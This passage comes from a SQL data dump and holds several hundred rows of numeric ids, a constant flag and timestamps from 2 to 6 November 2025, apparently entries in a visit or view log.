13:49:15'),(94071,4648,1,'2025-11-02','2025-11-02 13:55:02'),(94072,3781,1,'2025-11-02','2025-11-02 14:16:16'),(94073,5163,1,'2025-11-02','2025-11-02 14:18:55'),(94074,1709,1,'2025-11-02','2025-11-02 14:20:57'),(94075,5614,1,'2025-11-02','2025-11-02 14:22:38'),(94076,4837,1,'2025-11-02','2025-11-02 14:22:45'),(94077,3181,1,'2025-11-02','2025-11-02 14:24:40'),(94078,4368,1,'2025-11-02','2025-11-02 14:26:57'),(94079,5334,1,'2025-11-02','2025-11-02 14:33:53'),(94080,4983,1,'2025-11-02','2025-11-02 14:41:05'),(94081,3724,1,'2025-11-02','2025-11-02 14:58:58'),(94082,3541,1,'2025-11-02','2025-11-02 15:00:24'),(94083,4709,1,'2025-11-02','2025-11-02 15:15:03'),(94084,5522,1,'2025-11-02','2025-11-02 15:22:55'),(94085,2252,1,'2025-11-02','2025-11-02 15:22:57'),(94086,4762,1,'2025-11-02','2025-11-02 15:28:35'),(94087,5363,1,'2025-11-02','2025-11-02 15:36:23'),(94088,4741,1,'2025-11-02','2025-11-02 15:40:30'),(94089,5301,1,'2025-11-02','2025-11-02 15:51:38'),(94090,3788,1,'2025-11-02','2025-11-02 16:13:10'),(94091,5080,1,'2025-11-02','2025-11-02 16:14:47'),(94092,4517,1,'2025-11-02','2025-11-02 16:20:41'),(94093,68,1,'2025-11-02','2025-11-02 16:24:43'),(94094,4785,1,'2025-11-02','2025-11-02 16:24:54'),(94095,3707,1,'2025-11-02','2025-11-02 16:27:33'),(94096,5492,1,'2025-11-02','2025-11-02 16:32:49'),(94097,4651,1,'2025-11-02','2025-11-02 16:37:10'),(94098,2809,1,'2025-11-02','2025-11-02 16:45:09'),(94099,72,1,'2025-11-02','2025-11-02 16:49:26'),(94100,1598,1,'2025-11-02','2025-11-02 16:51:52'),(94101,3674,1,'2025-11-02','2025-11-02 16:57:30'),(94102,5420,1,'2025-11-02','2025-11-02 16:58:50'),(94103,4238,1,'2025-11-02','2025-11-02 16:59:27'),(94104,3710,1,'2025-11-02','2025-11-02 17:05:23'),(94105,3749,1,'2025-11-02','2025-11-02 17:12:07'),(94106,3034,1,'2025-11-02','2025-11-02 17:18:05'),(94107,4344,1,'2025-11-02','2025-11-02 17:19:24'),(94108,480,1,'2025-11-02','2025-11-02 17:19:33'),(94109,108,1,'2025-11-02','2025-11-02 17:19:45'),(94110,3674,1,'2025-11-02','2025-11-02 17:20:57'),(94111,3004,1,'2025-11-02','2025-11-02 17:24:50'),(94112,2558,1,'2025-11-02','2025-11-02 17:30:02'),(94113,4729,1,'2025-11-02','2025-11-02 17:30:19'),(94114,1743,1,'2025-11-02','2025-11-02 17:30:29'),(94115,471,1,'2025-11-02','2025-11-02 17:30:39'),(94116,3045,1,'2025-11-02','2025-11-02 17:35:49'),(94117,5436,1,'2025-11-02','2025-11-02 17:41:21'),(94118,485,1,'2025-11-02','2025-11-02 17:44:37'),(94119,4637,1,'2025-11-02','2025-11-02 17:45:06'),(94120,4744,1,'2025-11-02','2025-11-02 17:46:33'),(94121,4703,1,'2025-11-02','2025-11-02 17:52:01'),(94122,5502,1,'2025-11-02','2025-11-02 17:55:42'),(94123,5464,1,'2025-11-02','2025-11-02 17:56:15'),(94124,4691,1,'2025-11-02','2025-11-02 17:56:43'),(94125,3124,1,'2025-11-02','2025-11-02 18:01:40'),(94126,2748,1,'2025-11-02','2025-11-02 18:03:32'),(94127,3307,1,'2025-11-02','2025-11-02 18:06:33'),(94128,3069,1,'2025-11-02','2025-11-02 18:12:43'),(94129,3023,1,'2025-11-02','2025-11-02 18:14:17'),(94130,2704,1,'2025-11-02','2025-11-02 18:15:37'),(94131,3791,1,'2025-11-02','2025-11-02 18:17:34'),(94132,4408,1,'2025-11-02','2025-11-02 18:23:18'),(94133,3117,1,'2025-11-02','2025-11-02 18:23:35'),(94134,5428,1,'2025-11-02','2025-11-02 18:24:48'),(94135,4980,1,'2025-11-02','2025-11-02 18:26:58'),(94136,4238,1,'2025-11-02','2025-11-02 18:30:40'),(94137,3714,1,'2025-11-02','2025-11-02 18:31:21'),(94138,5268,1,'2025-11-02','2025-11-02 18:31:42'),(94139,2419,1,'2025-11-02','2025-11-02 18:32:35'),(94140,5397,1,'2025-11-02','2025-11-02 18:34:39'),(94141,4338,1,'2025-11-02','2025-11-02 18:39:13'),(94142,3752,1,'2025-11-02','2025-11-02 18:39:20'),(94143,5409,1,'2025-11-02','2025-11-02 18:44:28'),(94144,4514,1,'2025-11-02','2025-11-02 18:48:58'),(94145,4966,1,'2025-11-02','2025-11-02 18:52:44'),(94146,4238,1,'2025-11-02','2025-11-02 18:56:15'),(94147,2804,1,'2025-11-02','2025-11-02 18:57:02'),(94148,4660,1,'2025-11-02','2025-11-02 19:01:10'),(94149,5314,1,'2025-11-02','2025-11-02 19:05:53'),(94150,4759,1,'2025-11-02','2025-11-02 19:09:54'),(94151,4753,1,'2025-11-02','2025-11-02 19:13:28'),(94152,3479,1,'2025-11-02','2025-11-02 19:17:21'),(94153,5320,1,'2025-11-02','2025-11-02 19:25:04'),(94154,4700,1,'2025-11-02','2025-11-02 19:28:24'),(94155,5400,1,'2025-11-02','2025-11-02 19:32:05'),(94156,4498,1,'2025-11-02','2025-11-02 19:33:10'),(94157,4238,1,'2025-11-02','2025-11-02 19:36:16'),(94158,74,1,'2025-11-02','2025-11-02 19:38:19'),(94159,4660,1,'2025-11-02','2025-11-02 19:38:24'),(94160,5304,1,'2025-11-02','2025-11-02 19:38:26'),(94161,5353,1,'2025-11-02','2025-11-02 19:42:05'),(94162,3735,1,'2025-11-02','2025-11-02 19:45:15'),(94163,3313,1,'2025-11-02','2025-11-02 19:48:47'),(94164,4747,1,'2025-11-02','2025-11-02 19:51:33'),(94165,5570,1,'2025-11-02','2025-11-02 19:53:14'),(94166,1588,1,'2025-11-02','2025-11-02 19:55:01'),(94167,5292,1,'2025-11-02','2025-11-02 19:57:29'),(94168,4697,1,'2025-11-02','2025-11-02 20:00:47'),(94169,3489,1,'2025-11-02','2025-11-02 20:03:53'),(94170,3731,1,'2025-11-02','2025-11-02 20:06:41'),(94171,5454,1,'2025-11-02','2025-11-02 20:08:33'),(94172,2769,1,'2025-11-02','2025-11-02 20:09:46'),(94173,4950,1,'2025-11-02','2025-11-02 20:11:22'),(94174,5295,1,'2025-11-02','2025-11-02 20:12:45'),(94175,4756,1,'2025-11-02','2025-11-02 20:15:09'),(94176,4681,1,'2025-11-02','2025-11-02 20:20:48'),(94177,478,1,'2025-11-02','2025-11-02 20:22:46'),(94178,3267,1,'2025-11-02','2025-11-02 20:22:53'),(94179,3275,1,'2025-11-02','2025-11-02 20:25:03'),(94180,487,1,'2025-11-02','2025-11-02 20:25:04'),(94181,1739,1,'2025-11-02','2025-11-02 20:25:12'),(94182,2457,1,'2025-11-02','2025-11-02 20:26:23'),(94183,3290,1,'2025-11-02','2025-11-02 20:29:06'),(94184,3724,1,'2025-11-02','2025-11-02 20:29:59'),(94185,5400,1,'2025-11-02','2025-11-02 20:31:20'),(94186,3066,1,'2025-11-02','2025-11-02 20:31:30'),(94187,3058,1,'2025-11-02','2025-11-02 20:32:42'),(94188,4529,1,'2025-11-02','2025-11-02 20:34:00'),(94189,5578,1,'2025-11-02','2025-11-02 20:34:29'),(94190,3060,1,'2025-11-02','2025-11-02 20:38:37'),(94191,1602,1,'2025-11-02','2025-11-02 20:39:16'),(94192,4911,1,'2025-11-02','2025-11-02 20:41:44'),(94193,467,1,'2025-11-02','2025-11-02 20:44:15'),(94194,1870,1,'2025-11-02','2025-11-02 20:46:55'),(94195,2775,1,'2025-11-02','2025-11-02 20:51:33'),(94196,5489,1,'2025-11-02','2025-11-02 20:53:51'),(94197,5425,1,'2025-11-02','2025-11-02 20:54:48'),(94198,3764,1,'2025-11-02','2025-11-02 20:56:08'),(94199,4944,1,'2025-11-02','2025-11-02 20:58:31'),(94200,479,1,'2025-11-02','2025-11-02 20:59:54'),(94201,4688,1,'2025-11-02','2025-11-02 21:00:41'),(94202,1608,1,'2025-11-02','2025-11-02 21:02:56'),(94203,1701,1,'2025-11-02','2025-11-02 21:06:58'),(94204,3430,1,'2025-11-02','2025-11-02 21:07:17'),(94205,4301,1,'2025-11-02','2025-11-02 21:09:24'),(94206,3027,1,'2025-11-02','2025-11-02 21:12:00'),(94207,5593,1,'2025-11-02','2025-11-02 21:13:33'),(94208,4238,1,'2025-11-02','2025-11-02 21:15:28'),(94209,5464,1,'2025-11-02','2025-11-02 21:15:35'),(94210,4768,1,'2025-11-02','2025-11-02 21:17:41'),(94211,3090,1,'2025-11-02','2025-11-02 21:19:32'),(94212,5280,1,'2025-11-02','2025-11-02 21:22:02'),(94213,4738,1,'2025-11-02','2025-11-02 21:22:21'),(94214,3247,1,'2025-11-02','2025-11-02 21:22:28'),(94215,4612,1,'2025-11-02','2025-11-02 21:23:15'),(94216,1610,1,'2025-11-02','2025-11-02 21:25:42'),(94217,4400,1,'2025-11-02','2025-11-02 21:27:31'),(94218,5412,1,'2025-11-02','2025-11-02 21:28:18'),(94219,3083,1,'2025-11-02','2025-11-02 21:30:13'),(94220,4674,1,'2025-11-02','2025-11-02 21:31:59'),(94221,4712,1,'2025-11-02','2025-11-02 21:33:47'),(94222,5449,1,'2025-11-02','2025-11-02 21:36:38'),(94223,3109,1,'2025-11-02','2025-11-02 21:37:34'),(94224,5502,1,'2025-11-02','2025-11-02 21:37:37'),(94225,3006,1,'2025-11-02','2025-11-02 21:39:38'),(94226,4329,1,'2025-11-02','2025-11-02 21:41:09'),(94227,1612,1,'2025-11-02','2025-11-02 21:42:57'),(94228,3771,1,'2025-11-02','2025-11-02 21:44:54'),(94229,3752,1,'2025-11-02','2025-11-02 21:47:30'),(94230,4677,1,'2025-11-02','2025-11-02 21:48:17'),(94231,5289,1,'2025-11-02','2025-11-02 21:50:16'),(94232,3486,1,'2025-11-02','2025-11-02 21:51:51'),(94233,1596,1,'2025-11-02','2025-11-02 21:53:59'),(94234,1600,1,'2025-11-02','2025-11-02 21:55:36'),(94235,3297,1,'2025-11-02','2025-11-02 21:57:10'),(94236,4335,1,'2025-11-02','2025-11-02 21:58:52'),(94237,5489,1,'2025-11-02','2025-11-02 21:59:32'),(94238,4765,1,'2025-11-02','2025-11-02 22:00:43'),(94239,4275,1,'2025-11-02','2025-11-02 22:02:40'),(94240,3316,1,'2025-11-02','2025-11-02 22:07:27'),(94241,3738,1,'2025-11-02','2025-11-02 22:09:08'),(94242,5412,1,'2025-11-02','2025-11-02 22:11:32'),(94243,5125,1,'2025-11-02','2025-11-02 22:17:26'),(94244,3727,1,'2025-11-02','2025-11-02 22:17:48'),(94245,4582,1,'2025-11-02','2025-11-02 22:18:50'),(94246,4762,1,'2025-11-02','2025-11-02 22:19:38'),(94247,4750,1,'2025-11-02','2025-11-02 22:20:55'),(94248,4657,1,'2025-11-02','2025-11-02 22:23:49'),(94249,5406,1,'2025-11-02','2025-11-02 22:26:02'),(94250,84,1,'2025-11-02','2025-11-02 22:27:01'),(94251,5457,1,'2025-11-02','2025-11-02 22:27:16'),(94252,5622,1,'2025-11-02','2025-11-02 22:28:58'),(94253,4323,1,'2025-11-02','2025-11-02 22:29:04'),(94254,1614,1,'2025-11-02','2025-11-02 22:31:12'),(94255,4706,1,'2025-11-02','2025-11-02 22:32:25'),(94256,4498,1,'2025-11-02','2025-11-02 22:32:34'),(94257,4792,1,'2025-11-02','2025-11-02 22:34:00'),(94258,4840,1,'2025-11-02','2025-11-02 22:34:09'),(94259,4694,1,'2025-11-02','2025-11-02 22:34:10'),(94260,2989,1,'2025-11-02','2025-11-02 22:34:22'),(94261,4930,1,'2025-11-02','2025-11-02 22:40:04'),(94262,5343,1,'2025-11-02','2025-11-02 22:42:48'),(94263,3742,1,'2025-11-02','2025-11-02 22:45:31'),(94264,2904,1,'2025-11-02','2025-11-02 23:02:36'),(94265,4391,1,'2025-11-02','2025-11-02 23:21:38'),(94266,3787,1,'2025-11-02','2025-11-02 23:21:48'),(94267,2971,1,'2025-11-02','2025-11-02 23:23:59'),(94268,2395,1,'2025-11-02','2025-11-02 23:24:39'),(94269,4835,1,'2025-11-02','2025-11-02 23:24:51'),(94270,4845,1,'2025-11-02','2025-11-02 23:27:32'),(94271,4382,1,'2025-11-02','2025-11-02 23:29:18'),(94272,4712,1,'2025-11-02','2025-11-02 23:30:57'),(94273,3038,1,'2025-11-02','2025-11-02 23:36:34'),(94274,5409,1,'2025-11-02','2025-11-02 23:37:19'),(94275,5578,1,'2025-11-02','2025-11-02 23:38:43'),(94276,1734,1,'2025-11-02','2025-11-02 23:48:36'),(94277,4420,1,'2025-11-02','2025-11-02 23:50:44'),(94278,4373,1,'2025-11-03','2025-11-03 00:02:45'),(94279,5119,1,'2025-11-03','2025-11-03 00:04:52'),(94280,5323,1,'2025-11-03','2025-11-03 00:21:01'),(94281,5567,1,'2025-11-03','2025-11-03 00:21:36'),(94282,2991,1,'2025-11-03','2025-11-03 00:39:41'),(94283,4582,1,'2025-11-03','2025-11-03 00:44:32'),(94284,3680,1,'2025-11-03','2025-11-03 01:25:34'),(94285,5259,1,'2025-11-03','2025-11-03 01:26:43'),(94286,3055,1,'2025-11-03','2025-11-03 01:27:35'),(94287,3051,1,'2025-11-03','2025-11-03 01:27:43'),(94288,68,1,'2025-11-03','2025-11-03 01:28:43'),(94289,5292,1,'2025-11-03','2025-11-03 01:34:18'),(94290,5512,1,'2025-11-03','2025-11-03 01:37:45'),(94291,1776,1,'2025-11-03','2025-11-03 01:50:11'),(94292,5415,1,'2025-11-03','2025-11-03 02:09:29'),(94293,3290,1,'2025-11-03','2025-11-03 02:11:25'),(94294,3005,1,'2025-11-03','2025-11-03 02:13:28'),(94295,3175,1,'2025-11-03','2025-11-03 02:16:47'),(94296,4542,1,'2025-11-03','2025-11-03 02:19:32'),(94297,486,1,'2025-11-03','2025-11-03 02:24:03'),(94298,3229,1,'2025-11-03','2025-11-03 02:24:47'),(94299,3731,1,'2025-11-03','2025-11-03 02:37:23'),(94300,5062,1,'2025-11-03','2025-11-03 02:52:51'),(94301,3313,1,'2025-11-03','2025-11-03 03:00:47'),(94302,4893,1,'2025-11-03','2025-11-03 03:13:56'),(94303,4717,1,'2025-11-03','2025-11-03 03:18:04'),(94304,4802,1,'2025-11-03','2025-11-03 03:20:46'),(94305,1715,1,'2025-11-03','2025-11-03 03:24:56'),(94306,72,1,'2025-11-03','2025-11-03 03:41:10'),(94307,4845,1,'2025-11-03','2025-11-03 04:05:05'),(94308,2165,1,'2025-11-03','2025-11-03 04:15:56'),(94309,5598,1,'2025-11-03','2025-11-03 04:47:41'),(94310,1582,1,'2025-11-03','2025-11-03 05:02:03'),(94311,3781,1,'2025-11-03','2025-11-03 05:04:08'),(94312,5472,1,'2025-11-03','2025-11-03 05:05:09'),(94313,4827,1,'2025-11-03','2025-11-03 05:11:56'),(94314,4542,1,'2025-11-03','2025-11-03 05:30:58'),(94315,4722,1,'2025-11-03','2025-11-03 05:33:15'),(94316,5062,1,'2025-11-03','2025-11-03 06:01:40'),(94317,1602,1,'2025-11-03','2025-11-03 06:17:17'),(94318,5461,1,'2025-11-03','2025-11-03 06:26:53'),(94319,3673,1,'2025-11-03','2025-11-03 06:40:13'),(94320,3079,1,'2025-11-03','2025-11-03 06:51:25'),(94321,2156,1,'2025-11-03','2025-11-03 07:11:42'),(94322,3307,1,'2025-11-03','2025-11-03 07:14:18'),(94323,4941,1,'2025-11-03','2025-11-03 07:37:47'),(94324,1608,1,'2025-11-03','2025-11-03 07:46:18'),(94325,5609,1,'2025-11-03','2025-11-03 08:20:23'),(94326,3789,1,'2025-11-03','2025-11-03 08:22:17'),(94327,4420,1,'2025-11-03','2025-11-03 08:22:54'),(94328,1596,1,'2025-11-03','2025-11-03 08:27:43'),(94329,3261,1,'2025-11-03','2025-11-03 08:36:48'),(94330,5033,1,'2025-11-03','2025-11-03 08:37:52'),(94331,3691,1,'2025-11-03','2025-11-03 08:49:17'),(94332,5320,1,'2025-11-03','2025-11-03 08:55:03'),(94333,110,1,'2025-11-03','2025-11-03 09:38:46'),(94334,1770,1,'2025-11-03','2025-11-03 09:53:48'),(94335,4729,1,'2025-11-03','2025-11-03 10:12:46'),(94336,1604,1,'2025-11-03','2025-11-03 10:26:18'),(94337,3749,1,'2025-11-03','2025-11-03 10:27:11'),(94338,5601,1,'2025-11-03','2025-11-03 10:55:05'),(94339,5307,1,'2025-11-03','2025-11-03 11:17:11'),(94340,2775,1,'2025-11-03','2025-11-03 11:35:57'),(94341,91,1,'2025-11-03','2025-11-03 11:47:27'),(94342,1741,1,'2025-11-03','2025-11-03 11:55:25'),(94343,3269,1,'2025-11-03','2025-11-03 12:08:03'),(94344,474,1,'2025-11-03','2025-11-03 12:18:03'),(94345,2704,1,'2025-11-03','2025-11-03 12:32:04'),(94346,3249,1,'2025-11-03','2025-11-03 13:03:22'),(94347,5626,1,'2025-11-03','2025-11-03 13:10:20'),(94348,5128,1,'2025-11-03','2025-11-03 13:32:18'),(94349,5626,1,'2025-11-03','2025-11-03 13:52:51'),(94350,4608,1,'2025-11-03','2025-11-03 14:39:47'),(94351,4492,1,'2025-11-03','2025-11-03 15:14:39'),(94352,2617,1,'2025-11-03','2025-11-03 15:19:25'),(94353,1728,1,'2025-11-03','2025-11-03 15:29:24'),(94354,5626,1,'2025-11-03','2025-11-03 16:37:17'),(94355,1728,1,'2025-11-03','2025-11-03 16:58:07'),(94356,2991,1,'2025-11-03','2025-11-03 17:24:43'),(94357,5622,1,'2025-11-03','2025-11-03 17:24:49'),(94358,335,1,'2025-11-03','2025-11-03 18:17:08'),(94359,2411,1,'2025-11-03','2025-11-03 18:25:13'),(94360,1586,1,'2025-11-03','2025-11-03 18:35:11'),(94361,3781,1,'2025-11-03','2025-11-03 19:05:16'),(94362,1610,1,'2025-11-03','2025-11-03 19:08:08'),(94363,3069,1,'2025-11-03','2025-11-03 19:18:42'),(94364,4944,1,'2025-11-03','2025-11-03 19:27:59'),(94365,4944,1,'2025-11-03','2025-11-03 19:43:47'),(94366,5433,1,'2025-11-03','2025-11-03 20:09:00'),(94367,3752,1,'2025-11-03','2025-11-03 20:17:43'),(94368,5626,1,'2025-11-03','2025-11-03 20:51:56'),(94369,1709,1,'2025-11-03','2025-11-03 20:52:25'),(94370,80,1,'2025-11-03','2025-11-03 21:34:13'),(94371,5622,1,'2025-11-03','2025-11-03 22:13:44'),(94372,2704,1,'2025-11-03','2025-11-03 23:04:04'),(94373,4977,1,'2025-11-03','2025-11-03 23:23:23'),(94374,2775,1,'2025-11-03','2025-11-03 23:27:49'),(94375,4529,1,'2025-11-04','2025-11-04 01:23:35'),(94376,4608,1,'2025-11-04','2025-11-04 01:24:29'),(94377,2395,1,'2025-11-04','2025-11-04 01:35:24'),(94378,80,1,'2025-11-04','2025-11-04 01:35:24'),(94379,2410,1,'2025-11-04','2025-11-04 01:37:25'),(94380,2411,1,'2025-11-04','2025-11-04 01:38:13'),(94381,5425,1,'2025-11-04','2025-11-04 01:48:56'),(94382,76,1,'2025-11-04','2025-11-04 01:58:17'),(94383,5449,1,'2025-11-04','2025-11-04 02:31:03'),(94384,5578,1,'2025-11-04','2025-11-04 02:55:24'),(94385,80,1,'2025-11-04','2025-11-04 03:08:11'),(94386,80,1,'2025-11-04','2025-11-04 03:10:23'),(94387,5573,1,'2025-11-04','2025-11-04 04:03:31'),(94388,76,1,'2025-11-04','2025-11-04 04:33:01'),(94389,5406,1,'2025-11-04','2025-11-04 06:04:40'),(94390,1766,1,'2025-11-04','2025-11-04 06:36:01'),(94391,2904,1,'2025-11-04','2025-11-04 07:05:10'),(94392,3664,1,'2025-11-04','2025-11-04 07:42:23'),(94393,5428,1,'2025-11-04','2025-11-04 07:52:16'),(94394,3038,1,'2025-11-04','2025-11-04 08:02:42'),(94395,5409,1,'2025-11-04','2025-11-04 08:08:40'),(94396,5436,1,'2025-11-04','2025-11-04 08:41:53'),(94397,5567,1,'2025-11-04','2025-11-04 09:11:08'),(94398,3045,1,'2025-11-04','2025-11-04 09:59:18'),(94399,477,1,'2025-11-04','2025-11-04 10:06:32'),(94400,477,1,'2025-11-04','2025-11-04 10:06:41'),(94401,5626,1,'2025-11-04','2025-11-04 11:05:42'),(94402,4977,1,'2025-11-04','2025-11-04 11:25:50'),(94403,4335,1,'2025-11-04','2025-11-04 11:27:27'),(94404,2971,1,'2025-11-04','2025-11-04 11:36:36'),(94405,4612,1,'2025-11-04','2025-11-04 11:37:39'),(94406,91,1,'2025-11-04','2025-11-04 12:25:01'),(94407,72,1,'2025-11-04','2025-11-04 13:39:37'),(94408,2704,1,'2025-11-04','2025-11-04 13:43:08'),(94409,1728,1,'2025-11-04','2025-11-04 14:39:42'),(94410,1728,1,'2025-11-04','2025-11-04 14:50:21'),(94411,1728,1,'2025-11-04','2025-11-04 14:57:11'),(94412,1728,1,'2025-11-04','2025-11-04 14:58:13'),(94413,1728,1,'2025-11-04','2025-11-04 14:59:57'),(94414,4983,1,'2025-11-04','2025-11-04 15:00:47'),(94415,4556,1,'2025-11-04','2025-11-04 15:04:57'),(94416,473,1,'2025-11-04','2025-11-04 15:08:17'),(94417,1870,1,'2025-11-04','2025-11-04 15:08:17'),(94418,5276,1,'2025-11-04','2025-11-04 15:14:17'),(94419,5626,1,'2025-11-04','2025-11-04 15:26:00'),(94420,4681,1,'2025-11-04','2025-11-04 16:04:39'),(94421,5464,1,'2025-11-04','2025-11-04 16:06:31'),(94422,4712,1,'2025-11-04','2025-11-04 16:09:33'),(94423,4966,1,'2025-11-04','2025-11-04 16:23:32'),(94424,3710,1,'2025-11-04','2025-11-04 16:44:36'),(94425,3307,1,'2025-11-04','2025-11-04 18:32:48'),(94426,5626,1,'2025-11-04','2025-11-04 18:36:59'),(94427,5397,1,'2025-11-04','2025-11-04 19:13:05'),(94428,76,1,'2025-11-04','2025-11-04 19:14:51'),(94429,76,1,'2025-11-04','2025-11-04 19:15:36'),(94430,5515,1,'2025-11-04','2025-11-04 19:35:51'),(94431,4448,1,'2025-11-04','2025-11-04 20:30:11'),(94432,5512,1,'2025-11-04','2025-11-04 20:50:15'),(94433,3051,1,'2025-11-04','2025-11-04 21:04:43'),(94434,4660,1,'2025-11-04','2025-11-04 21:05:22'),(94435,5454,1,'2025-11-04','2025-11-04 21:41:36'),(94436,5400,1,'2025-11-04','2025-11-04 22:01:02'),(94437,4400,1,'2025-11-04','2025-11-04 22:10:15'),(94438,5489,1,'2025-11-04','2025-11-04 22:13:41'),(94439,5412,1,'2025-11-04','2025-11-04 22:17:47'),(94440,3117,1,'2025-11-04','2025-11-04 22:22:57'),(94441,5125,1,'2025-11-04','2025-11-04 22:34:49'),(94442,5441,1,'2025-11-04','2025-11-04 22:35:10'),(94443,5420,1,'2025-11-04','2025-11-04 23:17:58'),(94444,5436,1,'2025-11-04','2025-11-04 23:23:26'),(94445,5461,1,'2025-11-04','2025-11-04 23:41:45'),(94446,3486,1,'2025-11-04','2025-11-04 23:41:51'),(94447,5492,1,'2025-11-04','2025-11-04 23:46:09'),(94448,110,1,'2025-11-04','2025-11-04 23:54:44'),(94449,2704,1,'2025-11-05','2025-11-05 00:03:57'),(94450,2165,1,'2025-11-05','2025-11-05 00:25:24'),(94451,4980,1,'2025-11-05','2025-11-05 01:02:31'),(94452,5549,1,'2025-11-05','2025-11-05 01:09:00'),(94453,4363,1,'2025-11-05','2025-11-05 02:44:57'),(94454,4950,1,'2025-11-05','2025-11-05 03:46:37'),(94455,4651,1,'2025-11-05','2025-11-05 06:48:48'),(94456,4950,1,'2025-11-05','2025-11-05 07:31:47'),(94457,5588,1,'2025-11-05','2025-11-05 07:34:23'),(94458,4561,1,'2025-11-05','2025-11-05 07:56:51'),(94459,5593,1,'2025-11-05','2025-11-05 08:10:12'),(94460,1614,1,'2025-11-05','2025-11-05 08:32:22'),(94461,5454,1,'2025-11-05','2025-11-05 08:45:22'),(94462,2154,1,'2025-11-05','2025-11-05 08:56:14'),(94463,5593,1,'2025-11-05','2025-11-05 09:04:02'),(94464,1699,1,'2025-11-05','2025-11-05 09:11:40'),(94465,5567,1,'2025-11-05','2025-11-05 09:33:22'),(94466,3275,1,'2025-11-05','2025-11-05 10:10:17'),(94467,5005,1,'2025-11-05','2025-11-05 10:17:22'),(94468,1544,1,'2025-11-05','2025-11-05 10:26:56'),(94469,2704,1,'2025-11-05','2025-11-05 10:46:18'),(94470,5573,1,'2025-11-05','2025-11-05 11:05:30'),(94471,5573,1,'2025-11-05','2025-11-05 11:05:39'),(94472,5573,1,'2025-11-05','2025-11-05 11:05:41'),(94473,5573,1,'2025-11-05','2025-11-05 11:05:56'),(94474,68,1,'2025-11-05','2025-11-05 12:28:40'),(94475,470,1,'2025-11-05','2025-11-05 12:56:58'),(94476,3267,1,'2025-11-05','2025-11-05 13:35:54'),(94477,1614,1,'2025-11-05','2025-11-05 13:39:34'),(94478,4950,1,'2025-11-05','2025-11-05 13:42:21'),(94479,5359,1,'2025-11-05','2025-11-05 14:34:29'),(94480,474,1,'2025-11-05','2025-11-05 14:46:50'),(94481,474,1,'2025-11-05','2025-11-05 14:46:50'),(94482,4988,1,'2025-11-05','2025-11-05 14:47:26'),(94483,5317,1,'2025-11-05','2025-11-05 15:00:34'),(94484,5397,1,'2025-11-05','2025-11-05 15:08:00'),(94485,5122,1,'2025-11-05','2025-11-05 15:13:15'),(94486,4950,1,'2025-11-05','2025-11-05 15:13:31'),(94487,2704,1,'2025-11-05','2025-11-05 16:03:49'),(94488,91,1,'2025-11-05','2025-11-05 16:04:26'),(94489,5409,1,'2025-11-05','2025-11-05 16:07:39'),(94490,4454,1,'2025-11-05','2025-11-05 16:15:22'),(94491,3774,1,'2025-11-05','2025-11-05 16:24:28'),(94492,4520,1,'2025-11-05','2025-11-05 16:26:24'),(94493,1610,1,'2025-11-05','2025-11-05 16:33:30'),(94494,91,1,'2025-11-05','2025-11-05 16:49:50'),(94495,481,1,'2025-11-05','2025-11-05 16:51:37'),(94496,4323,1,'2025-11-05','2025-11-05 17:19:12'),(94497,335,1,'2025-11-05','2025-11-05 17:44:14'),(94498,5502,1,'2025-11-05','2025-11-05 18:02:01'),(94499,3307,1,'2025-11-05','2025-11-05 18:07:27'),(94500,4612,1,'2025-11-05','2025-11-05 18:20:54'),(94501,5397,1,'2025-11-05','2025-11-05 19:15:21'),(94502,5433,1,'2025-11-05','2025-11-05 19:45:21'),(94503,5058,1,'2025-11-05','2025-11-05 19:51:46'),(94504,5457,1,'2025-11-05','2025-11-05 20:51:52'),(94505,1544,1,'2025-11-05','2025-11-05 21:32:56'),(94506,5400,1,'2025-11-05','2025-11-05 22:15:14'),(94507,5425,1,'2025-11-05','2025-11-05 22:33:18'),(94508,5530,1,'2025-11-05','2025-11-05 23:06:29'),(94509,4400,1,'2025-11-05','2025-11-05 23:11:21'),(94510,2775,1,'2025-11-05','2025-11-05 23:15:43'),(94511,4762,1,'2025-11-05','2025-11-05 23:23:52'),(94512,5071,1,'2025-11-05','2025-11-05 23:30:08'),(94513,5489,1,'2025-11-05','2025-11-05 23:50:38'),(94514,4635,1,'2025-11-05','2025-11-05 23:58:23'),(94515,3267,1,'2025-11-06','2025-11-06 00:06:30'),(94516,4950,1,'2025-11-06','2025-11-06 00:39:49'),(94517,2804,1,'2025-11-06','2025-11-06 00:48:36'),(94518,5428,1,'2025-11-06','2025-11-06 01:08:36'),(94519,84,1,'2025-11-06','2025-11-06 01:10:24'),(94520,5397,1,'2025-11-06','2025-11-06 01:15:45'),(94521,5561,1,'2025-11-06','2025-11-06 01:16:23'),(94522,5578,1,'2025-11-06','2025-11-06 01:36:41'),(94523,5567,1,'2025-11-06','2025-11-06 01:52:40'),(94524,470,1,'2025-11-06','2025-11-06 01:58:11'),(94525,3056,1,'2025-11-06','2025-11-06 01:59:07'),(94526,3045,1,'2025-11-06','2025-11-06 02:04:19'),(94527,3664,1,'2025-11-06','2025-11-06 02:13:02'),(94528,4950,1,'2025-11-06','2025-11-06 02:13:04'),(94529,4950,1,'2025-11-06','2025-11-06 02:15:08'),(94530,4960,1,'2025-11-06','2025-11-06 02:44:53'),(94531,2704,1,'2025-11-06','2025-11-06 03:02:39'),(94532,72,1,'2025-11-06','2025-11-06 03:53:32'),(94533,5420,1,'2025-11-06','2025-11-06 04:02:28'),(94534,4440,1,'2025-11-06','2025-11-06 04:13:36'),(94535,5507,1,'2025-11-06','2025-11-06 04:36:49'),(94536,4983,1,'2025-11-06','2025-11-06 05:46:43'),(94537,5406,1,'2025-11-06','2025-11-06 06:08:16'),(94538,3486,1,'2025-11-06','2025-11-06 06:43:52'),(94539,72,1,'2025-11-06','2025-11-06 06:44:10'),(94540,5363,1,'2025-11-06','2025-11-06 06:58:21'),(94541,472,1,'2025-11-06','2025-11-06 07:05:05'),(94542,5495,1,'2025-11-06','2025-11-06 07:55:22'),(94543,5122,1,'2025-11-06','2025-11-06 08:32:34'),(94544,5464,1,'2025-11-06','2025-11-06 08:49:01'),(94545,4712,1,'2025-11-06','2025-11-06 08:57:12'),(94546,5054,1,'2025-11-06','2025-11-06 09:31:20'),(94547,4996,1,'2025-11-06','2025-11-06 10:01:02'),(94548,2419,1,'2025-11-06','2025-11-06 10:12:42'),(94549,5457,1,'2025-11-06','2025-11-06 10:26:17'),(94550,2063,1,'2025-11-06','2025-11-06 11:14:34'),(94551,4963,1,'2025-11-06','2025-11-06 11:23:45'),(94552,5499,1,'2025-11-06','2025-11-06 12:22:31'),(94553,3746,1,'2025-11-06','2025-11-06 12:55:42'),(94554,5441,1,'2025-11-06','2025-11-06 13:27:07'),(94555,1739,1,'2025-11-06','2025-11-06 